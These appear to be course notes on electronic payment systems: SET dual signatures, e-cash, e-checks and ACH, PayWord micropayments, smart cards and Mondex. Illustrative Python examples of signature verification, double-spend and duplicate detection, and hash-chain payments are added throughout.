- SET aims at satisfying the following security requirements in the context of credit card payment:
  - Confidentiality: sensitive messages are encrypted so that they are kept confidential.
  - Integrity: nearly all messages are digitally signed to ensure content integrity.
  - Authentication: authentication is performed through a public key infrastructure.

SET network architecture

- Merchant: a seller, which is connected to an acquirer.
- Cardholder: a registered holder of the credit card, who is a buyer.
- Issuer: the bank that issues the credit card to a cardholder.
- Acquirer: the bank that serves as an "agent" linking a merchant to multiple issuers. A merchant can process various credit cards through a single acquirer.
- Payment gateway: typically connected to the acquirer. The payment gateway sits between the SET system and the financial network of the existing credit card system, and processes the credit card payment.

SET Digital Certificate System


Dual signature generation and verification -

- In the physical credit card system:
  - the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
  - data integrity can basically be ensured by using printed receipts;
  - cardholder authentication relies on simple signature checking only.
- In an electronic credit card system:
  - the Order Information (OI) and PI can be digitally signed to ensure data integrity;
  - the sensitive credit card information may still be disclosed to other parties.
- SET introduces a method called the dual signature (DS) to ensure data integrity while protecting the sensitive information: the cardholder signs H[ H[PI] || H[OI] ], the hash of the two concatenated hashes, so that each party can verify the signature over the part it is allowed to see plus only the hash of the part it is not.


How the merchant and the payment gateway can verify the DS

- The merchant is provided with OI, H[PI] and DS.
- The dual signature can be verified as follows:

Step 1: The merchant first computes H[ H[PI] || H[OI] ].

Step 2: The merchant then recovers the signed digest from the dual signature using the cardholder's public signature key:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, the merchant compares the two values H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS, and the OI and H[PI] it covers, have not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS, and verifies in the same way, computing H[ H[PI] || H[OI] ] from its own copy of PI and the supplied H[OI].

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or the PI is changed, the dual signature will no longer be valid.
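As an added example, not code from the original notes, the dual signature construction and the two verification paths described above in Python. The RSA key pair is a toy textbook key built from two Mersenne primes so the script runs with the standard library only; real SET used 1024-bit RSA keys with proper signature padding. The order and card data are constructed sample messages, and SHA-256 stands in for the digest SET actually used.

```python
import hashlib

# --- Toy textbook RSA (ASSUMPTION: stand-in for the cardholder's RSA signature key pair).
# Two Mersenne primes give a ~92-bit modulus, enough for the demo and nothing else;
# real SET used 1024-bit keys with padded signatures.
P = (1 << 31) - 1
Q = (1 << 61) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # cardholder's private signature exponent


def H(data: bytes) -> bytes:
    """Message digest used throughout (SHA-256 here)."""
    return hashlib.sha256(data).digest()


def _as_int(digest: bytes) -> int:
    # Keep the signed value below the toy modulus: 11 bytes < 2**88 < N.
    return int.from_bytes(digest[:11], "big")


def rsa_sign(digest: bytes) -> int:
    """Cardholder signs a digest with the private signature key."""
    return pow(_as_int(digest), D, N)


def rsa_verify(sig: int, digest: bytes) -> bool:
    """Anyone holding the public key (N, E) recovers the signed digest and compares."""
    return pow(sig, E, N) == _as_int(digest)


def dual_sign(oi: bytes, pi: bytes) -> int:
    """DS = Sign( H[ H[PI] || H[OI] ] ), the concatenation order used in the text."""
    return rsa_sign(H(H(pi) + H(oi)))


def merchant_verify(oi: bytes, h_pi: bytes, ds: int) -> bool:
    """Merchant sees OI in clear plus only the digest of PI."""
    return rsa_verify(ds, H(h_pi + H(oi)))


def gateway_verify(pi: bytes, h_oi: bytes, ds: int) -> bool:
    """Payment gateway sees PI in clear plus only the digest of OI."""
    return rsa_verify(ds, H(H(pi) + h_oi))


# Constructed sample messages (not real order or card data).
OI = b"merchant=bookshop;order=1001;item=textbook;amount=INR450"
PI = b"pan=4111111111111111;exp=12/30;amount=INR450;order=1001"


def demo() -> dict:
    ds = dual_sign(OI, PI)
    tampered_oi = OI.replace(b"INR450", b"INR45")
    return {
        "merchant_ok": merchant_verify(OI, H(PI), ds),
        "gateway_ok": gateway_verify(PI, H(OI), ds),
        "merchant_rejects_tampered_oi": not merchant_verify(tampered_oi, H(PI), ds),
        "gateway_rejects_swapped_order": not gateway_verify(PI, H(tampered_oi), ds),
    }


if __name__ == "__main__":
    print(demo())
```

The merchant never receives PI and the gateway never receives OI, yet both verify the same DS, and changing either half (here, the amount in the OI) breaks verification for whichever party checks it.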

DIGITAL ENVELOPE -

A digital envelope is the SET construction for confidentiality: the message is encrypted with a fresh symmetric key, and that key is encrypted with the recipient's public key-exchange key, so that only the intended recipient (for example the payment gateway, in the case of the PI) can open it.


SET PROTOCOL -

The SET protocol has four phases: initiation, purchase, authorisation and capture.

1. First the cardholder sends a purchase initiation request to the merchant to initialise the payment; the merchant returns a response message to the cardholder.
2. In the second phase the cardholder sends the purchase order together with the payment instruction to the merchant.
3. In the third phase the merchant obtains authorisation from the issuer via the payment gateway.
4. Finally (capture) the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. The money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

- Issuers
- Customers
- Merchants or traders
- Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend e-cash. Merchants and traders are vendors who receive e-cash. Regulators are the relevant authorities or state tax agencies.

For an e-cash transaction to occur, we need to go through at least three stages:

- Account setup: customers obtain e-cash accounts through certain issuers. Merchants who would like to accept e-cash also need to arrange accounts with the various e-cash issuers. Issuers typically handle the accounting for customers and merchants.
- Purchase: customers purchase goods or services and give the merchants tokens which represent the equivalent e-cash. Purchase information is usually encrypted when transmitted over the network.
- Authentication: merchants contact the e-cash issuers about the purchase and the amount of e-cash involved. The e-cash issuers then authenticate the transaction and approve the amount of e-cash involved.

E-cash payment system -

For accessing services online, e-cash is a prime method of secure online payment. The following model shows how the e-cash payment system works.

This is a simple model of the e-cash payment system and gives an idea of how it works.

1. The customer approaches the issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds or as specified by the customer.
2. In the second phase the customer endorses those tokens to the merchant to acquire services, and authenticates the payment for the trader.
3. In the third phase the trader approaches the token issuer (the customer's bank); after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers the same into the trader's account.
4. Finally, after receiving payment for the respective services, the trader provides the requisite service or product and notifies the customer that the payment has been credited to the trader's account.
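As an added example, not code from the original notes, a minimal issuer that runs the three stages described above (and in the account setup / purchase / authentication list before it): tokens are withdrawn against an account, handed to the merchant, and deposited, with forged and double-spent tokens rejected at deposit. It assumes the issuer authenticates tokens with an HMAC under its own secret key; real e-cash uses the bank's (often blind) digital signature, which also gives the anonymity property an HMAC does not. Account names, balances and denominations are constructed.

```python
import hashlib
import hmac
import secrets

# ASSUMPTION: a demo issuer key generated per run; a real issuer would sign tokens.
ISSUER_KEY = secrets.token_bytes(32)


class Issuer:
    """The bank: keeps account balances, mints tokens, and records spent serial numbers."""

    def __init__(self, key: bytes):
        self._key = key
        self.balances = {}     # account name -> balance (whole rupees, constructed)
        self.spent = set()     # serial numbers already deposited

    def _tag(self, serial: str, value: int) -> str:
        # Binds the serial to its value so a merchant cannot inflate a token.
        return hmac.new(self._key, f"{serial}:{value}".encode(), hashlib.sha256).hexdigest()

    def open_account(self, name: str, balance: int) -> None:
        self.balances[name] = balance

    def withdraw(self, customer: str, denominations) -> list:
        """Phase 1: debit the account and mint one token per denomination."""
        total = sum(denominations)
        if self.balances.get(customer, 0) < total:
            raise ValueError("insufficient funds")
        self.balances[customer] -= total
        tokens = []
        for value in denominations:
            serial = secrets.token_hex(16)   # unique, like a banknote serial number
            tokens.append({"serial": serial, "value": value, "tag": self._tag(serial, value)})
        return tokens

    def deposit(self, merchant: str, token: dict) -> str:
        """Phase 3: authenticate the token, then refuse any serial seen before."""
        expected = self._tag(token["serial"], token["value"])
        if not hmac.compare_digest(token["tag"], expected):
            return "rejected: forged token"
        if token["serial"] in self.spent:
            return "rejected: double spend"
        self.spent.add(token["serial"])
        self.balances[merchant] = self.balances.get(merchant, 0) + token["value"]
        return "accepted"


def demo() -> dict:
    bank = Issuer(ISSUER_KEY)
    bank.open_account("alice", 500)
    bank.open_account("bookshop", 0)
    tokens = bank.withdraw("alice", [100, 10, 10])   # phase 1
    paid = tokens[0]                                 # phase 2: handed to the merchant
    return {
        "first_deposit": bank.deposit("bookshop", paid),
        "replayed_deposit": bank.deposit("bookshop", paid),
        "inflated_token": bank.deposit("bookshop", dict(paid, value=1000)),
        "alice_balance": bank.balances["alice"],
        "bookshop_balance": bank.balances["bookshop"],
    }


if __name__ == "__main__":
    print(demo())
```

The spent-serial set is the whole double-spend defence in an online scheme: the issuer, not the merchant, decides whether a token is still valid, so a merchant who accepts a token without depositing it promptly carries the risk.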


E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is considered more secure than card-based online payment modes because no card credential such as a card number or password is presented to the merchant; the payment is effectively a fund transfer from the customer's account to the trader's account carried by tokens.

However, while accessing the customer's account, the customer must guard against Internet eavesdropping and credential theft. Online hacking and cracking can be mitigated by using SSL/TLS website security, keeping the website link on HTTPS, and running proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

- We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft: with electronic cash the customer does not need to provide financial information to the merchant.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a threshold below which no additional charge applies, so very low-value payments are not charged a fee.

Limitations

- However secure the e-cash payment system is, no one is safe against online fraud. Here the fraud is on the trader's side: the trader may take the amount but not provide the services.
- While making the payment it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet connection fails midway, it can lead to loss of information, i.e. the amount is charged but does not reach the trader, and the refund takes a very long time (in general at least 30-45 days).
- E-cash is not for everyone. Low-income segments without computer and Internet access are unable to use e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make e-cash better. In countries such as India, where people were hesitant to use such methods, there has been tremendous growth in online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is a customer paying by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to transfer money electronically directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing and checking account number, and after verification the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments, and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies with records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. A digital signature, backed by a digital certificate that binds the signer's public key to an identity, gives the receiver a reliable indication that the information was actually sent by the sender and has not been altered. They're used on the Internet to confirm the identity of a customer much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses a key pair to sign and verify (or encrypt and decrypt) a message. With electronic check conversion, the private key is the secret used to create the digital signature on the eCheck, and the public key is given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible.

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a take-away copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer/bill payer) is prompted to authorise an electronic debit and enters the bank routing number (ABA) and account number.
2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards the approve/decline result to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.
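As an added example, not part of the CyberSource material or any processor's real code, steps 3 to 6 on the processor side in Python: the ABA routing-number check-digit test, a screen against a negative-account list (the "negative account databases" mentioned earlier), and the duplicate-presentment detection from the "Duplicate detection" item. The two valid routing numbers and the invalid one are sample input chosen only to pass or fail the check digit; the account numbers, check numbers, amounts and the 4-17 digit account-length rule are assumptions for the demo.

```python
# ABA routing transit number check digit: weights 3,7,1 repeating, sum must be 0 mod 10.
ABA_WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def valid_routing_number(rtn: str) -> bool:
    """Nine digits whose weighted sum is divisible by 10; catches most keying errors."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    return sum(int(d) * w for d, w in zip(rtn, ABA_WEIGHTS)) % 10 == 0


class EcheckProcessor:
    """Stand-in for the processor in steps 3-6 (assumed behaviour, not CyberSource's)."""

    def __init__(self, negative_accounts=()):
        self.negative = set(negative_accounts)   # (rtn, account) pairs with a fraud/NSF history
        self.presented = set()                   # duplicate-detection ledger
        self.settlement_queue = []               # items handed on to ACH settlement

    def authorize(self, rtn: str, account: str, check_no: str, amount_cents: int) -> str:
        if not valid_routing_number(rtn):
            return "decline: invalid routing number"
        # ASSUMPTION: account numbers are 4-17 digits (the ACH account field is 17 characters).
        if not account.isdigit() or not 4 <= len(account) <= 17:
            return "decline: malformed account number"
        if amount_cents <= 0:
            return "decline: invalid amount"
        if (rtn, account) in self.negative:
            return "decline: negative database hit"
        # The same check presented twice (same account, number and amount) is a duplicate,
        # whether by operator error or by a merchant submitting the image a second time.
        key = (rtn, account, check_no, amount_cents)
        if key in self.presented:
            return "decline: duplicate presentment"
        self.presented.add(key)
        self.settlement_queue.append(key)
        return "approve"


def demo() -> dict:
    # Constructed sample input: one account on the negative list, one good account.
    proc = EcheckProcessor(negative_accounts={("011000015", "555000111")})
    return {
        "good": proc.authorize("021000021", "123456789012", "1001", 4500),
        "replay": proc.authorize("021000021", "123456789012", "1001", 4500),
        "next_check": proc.authorize("021000021", "123456789012", "1002", 4500),
        "bad_rtn": proc.authorize("021000022", "123456789012", "1003", 1000),
        "negative": proc.authorize("011000015", "555000111", "77", 1000),
        "queued": len(proc.settlement_queue),
    }


if __name__ == "__main__":
    print(demo())
```

The check digit only proves the number is well formed; whether the account exists and has funds is what the "checking history" lookup in step 4 and the eventual ACH return codes establish, which is why funds are not final for 1-3 business days.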

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based), PayWord (post-payment).
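PayWord, named above as a post-payment scheme, avoids a signature per payment by using a hash chain: the customer signs only the root of the chain once, then pays by releasing successive pre-images, and the vendor redeems the last one it holds in a single deposit. As an added example, not code from the original notes, the customer-side chain and the vendor's verification in Python. It assumes the root w_0 was delivered to the vendor in a signed commitment (the signing step itself is omitted), and the chain length and payment sizes are constructed.

```python
import hashlib
import secrets


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


class PaywordChain:
    """Customer side: w_n is random, w_{i-1} = h(w_i); w_0 is the commitment sent to the vendor."""

    def __init__(self, n: int):
        self.n = n
        w = secrets.token_bytes(32)
        chain = [w]
        for _ in range(n):
            w = h(w)
            chain.append(w)
        chain.reverse()            # chain[i] == w_i, chain[0] == w_0
        self._chain = chain
        self.spent = 0             # index of the last payword released

    def root(self) -> bytes:
        return self._chain[0]

    def pay(self, units: int) -> tuple:
        """Spend `units` more by revealing w_{spent+units}: one hash, no signature."""
        i = self.spent + units
        if units <= 0 or i > self.n:
            raise ValueError("chain exhausted or bad amount")
        self.spent = i
        return self._chain[i], i


class Vendor:
    """Vendor side: keeps only the latest (w_i, i); verifies by hashing back to the previous one."""

    def __init__(self, root: bytes, n: int):
        self.last, self.last_idx, self.n = root, 0, n

    def accept(self, w: bytes, i: int) -> bool:
        if not (self.last_idx < i <= self.n):
            return False            # replay, out of order, or beyond the committed length
        x = w
        for _ in range(i - self.last_idx):
            x = h(x)
        if x != self.last:
            return False            # not on the committed chain
        self.last, self.last_idx = w, i
        return True

    def deposit(self) -> tuple:
        """One redemption with the broker covers every payment so far: (w_k, k) is worth k units."""
        return self.last, self.last_idx


def demo() -> dict:
    customer = PaywordChain(n=10)
    vendor = Vendor(customer.root(), n=10)   # root assumed delivered in a signed commitment
    w1, i1 = customer.pay(1)
    w3, i3 = customer.pay(2)
    return {
        "pay_one": vendor.accept(w1, i1),
        "pay_two_more": vendor.accept(w3, i3),
        "replay": vendor.accept(w1, i1),
        "forged": vendor.accept(secrets.token_bytes(32), 4),
        "deposit_index": vendor.deposit()[1],
    }


if __name__ == "__main__":
    print(demo())
```

Because h is one-way, a vendor holding w_3 cannot produce w_4, so it cannot claim more than the customer released; and because the chain is committed to one vendor, the customer cannot pay the same payword to two vendors without the broker noticing at deposit.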


MICROPAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- An alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content. Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here is one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialised resources will make pay-per-use common online.

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable to businesses where even small costs for every single transaction would be inefficient. The main benefits for the customer in using micropayments are speed and flexibility. From the merchant's side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority; more important than security is trust. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before seeing a return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) how to pay for desired content or goods.

The most common micropayment options are listed below:[6]

Call2pay – Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay – Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay – Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card – Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).

Direct debit – Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards? –

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

Protect against a full range of security threats

Advantages –

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned: the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT –

Reliable off-line payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information

o limits for using, disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits

o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
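The rolling transaction log noted under the privacy principles and the overflow problem described just above, as an added simulation that is not Mondex's own code or protocol: two purses exchange value directly and each keeps only its last ten transactions, so entries overwritten before an upload are lost to the bank's audit. The cryptographic protection between cards is not modelled; the card ids, amounts and log size are constructed.

```python
"""Offline card-to-card value transfer with a rolling on-card log (added example)."""
from collections import deque
from dataclasses import dataclass, field
from decimal import Decimal
from itertools import count

LOG_SIZE = 10           # "rolling 10 transactions" kept on the card
_seq = count(1)         # constructed stand-in for a transaction sequence number


@dataclass
class Purse:
    """Stored-value purse on one card."""
    card_id: str
    balance: Decimal
    # deque(maxlen=...) silently discards the oldest entry when full,
    # which is exactly the overflow behaviour the notes describe
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_SIZE))
    dropped: int = 0    # entries overwritten before any upload took place

    def _record(self, entry: tuple) -> None:
        if len(self.log) == self.log.maxlen:
            self.dropped += 1
        self.log.append(entry)


def transfer(payer: Purse, payee: Purse, amount: Decimal, retailer: str) -> bool:
    """Offline transfer: value leaves one card and arrives on the other.

    Both sides log the same sequence number so that, once uploaded, the
    bank can match a debit on one card against the credit on the other.
    """
    if amount <= 0 or amount > payer.balance:
        return False
    seq = next(_seq)
    payer.balance -= amount
    payee.balance += amount
    payer._record((seq, "debit", payee.card_id, retailer, amount))
    payee._record((seq, "credit", payer.card_id, retailer, amount))
    return True


def upload(purse: Purse) -> list:
    """Retailer/ATM upload: hand whatever survives on the card to the bank."""
    entries = list(purse.log)
    purse.log.clear()
    return entries


def value_conserved(purses: list, expected_total: Decimal) -> bool:
    """Bank-side sanity check: offline transfers must not create or destroy value."""
    return sum(p.balance for p in purses) == expected_total


def run_demo() -> tuple:
    """Constructed session: twelve 1.00 purchases before the first upload."""
    alice = Purse("CARD-A", Decimal("20.00"))
    shop = Purse("CARD-S", Decimal("0.00"))
    for _ in range(12):
        transfer(alice, shop, Decimal("1.00"), "CornerShop")
    return alice, shop


if __name__ == "__main__":
    alice, shop = run_demo()
    print(f"balances: {alice.balance} / {shop.balance}")
    print(f"entries lost from {alice.card_id} before upload: {alice.dropped}")
    print("uploaded from card A:", upload(alice))
```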

E-GOVERNANCE

